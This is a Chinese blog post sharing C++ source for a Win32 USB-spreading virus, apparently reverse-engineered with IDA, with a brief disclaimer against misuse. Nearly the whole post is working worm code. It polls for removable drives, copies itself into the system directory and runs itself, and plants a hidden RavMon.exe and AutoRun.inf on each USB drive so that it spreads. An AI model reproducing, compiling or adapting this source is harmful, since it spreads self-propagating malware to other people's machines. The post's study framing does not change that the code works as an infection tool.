一个简单的C++编写的u盘病毒代码

2015/07/01 54902

清华大佬耗费三个月吐血整理的几百G的资源,免费分享!....>>>

一个简单的C++编写的u盘病毒代码
一个win32下能用的U盘病毒 研究原理可以 别编译拿去害人就行 (ring3的病毒貌似也害不了人) 前久用IDA逆向出来的 感兴趣的可以看看。。。 
#include<windows.h>
#include<string.h>
  
BOOL UDevice();
 
void ResourceToFile(char  *filename,char *Name,char* Type);
 
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
     LPSTR lpCmdLine, int nShowCmd)
 {
     UDevice();
    return 0;
 }
 
 BOOL UDevice()
 {
     
     while(1)
     {
         char Name[256]="H:\\";
         char szName[256];
         char ToPath[256];
         char infPath[256];
         char OpenUDevice[79];
  
         UINT retType;
      
         memset(szName, 0, 256);
         memset(ToPath, 0, 256);
         memset(infPath, 0, 256);
         memset(OpenUDevice, 0, 79);
     
     
     //do
     //{
     //}while()
     
     //遍历盘符
         unsigned char i = 0x42;
         for(; i < 0x5B; i += 0x1)
         {
           Name[0] = i;
           retType = GetDriveType(Name);
           //判断是否是可移动存储设备
           if(retType == DRIVE_REMOVABLE)
           {
                //得到自身文件路径
                GetModuleFileName(NULL, szName, 256);
                //比较是否和U盘的盘符相同
                if(strncmp(Name, szName, 1) == 0)
                {
                    //得到系统目录
                   GetSystemDirectory(ToPath, 256);
                   strcat(ToPath,"\\Uinfect.exe");
                   //把自身文件复制到系统目录
                   if(CopyFile(szName, ToPath, TRUE))
                   {
                       WinExec(ToPath, 0);//运行程序
                   }
 
                   strcpy(OpenUDevice, "explorer ");
                   strcat(OpenUDevice, Name);
                   
                   //打开U盘
                   WinExec(OpenUDevice,1);
                   return 0;  
                }
                else
                {
                    strcpy(ToPath, Name);
                    strcat(ToPath,"\\RavMon.exe");
                    strcpy(infPath,Name);
                    strcat(infPath,"\\AutoRun.inf");
 
 
                    //还原U盘上的文件属性
                    SetFileAttributes(ToPath,FILE_ATTRIBUTE_NORMAL);
                    SetFileAttributes(infPath,FILE_ATTRIBUTE_NORMAL);
                    //删除原有文件
                    DeleteFile(ToPath);
                    DeleteFile(infPath);
                    //释放AutoRun.inf到U盘
                    ResourceToFile(infPath, (char*)0x64, (char*)256);
                    //拷贝自身文件到U盘
                    CopyFile(szName,ToPath,FALSE);
                    
                    //把这两个文件设置成系统,隐藏属性
                    
                    //这里我查了MSDN  因为第二个参数的宏可能用了或位运算,所以推导宏定义有点麻烦
                    SetFileAttributes(ToPath, 0x6);
                    SetFileAttributes(infPath, 0x6);
                }
           }
         }
         //一分钟检测一次U盘
         Sleep(60000);
     }
    
 }
 
 
void ResourceToFile(char  *filename,char *Name,char* Type)
{  
    
    //寻找自身进程中的资源
    HRSRC hRes = FindResource(NULL,Name,Type);
    if(hRes==NULL)
        return;
    //导入资源
    HGLOBAL hgRes = LoadResource(NULL, hRes);
    if(hgRes==NULL)
        return;
    //锁定资源
    void *pRes = LockResource(hgRes);
    if(pRes==NULL)
        return;
    //得到资源字节数
    DWORD size = SizeofResource(NULL, hRes);
    if(size==0)
        return;
    //创建文件
    HANDLE hFile = CreateFile(filename, 0x40000000, 0, 0,
                     CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL, 0);
    if(hFile==INVALID_HANDLE_VALUE)
        return;
    DWORD dwWrite;
    //把资源写入到文件
    if(!WriteFile(hFile, pRes, size, &dwWrite, 0))
        return;
    //关闭文件句柄
    CloseHandle(hFile);
    //释放资源
    GlobalFree(hgRes);
}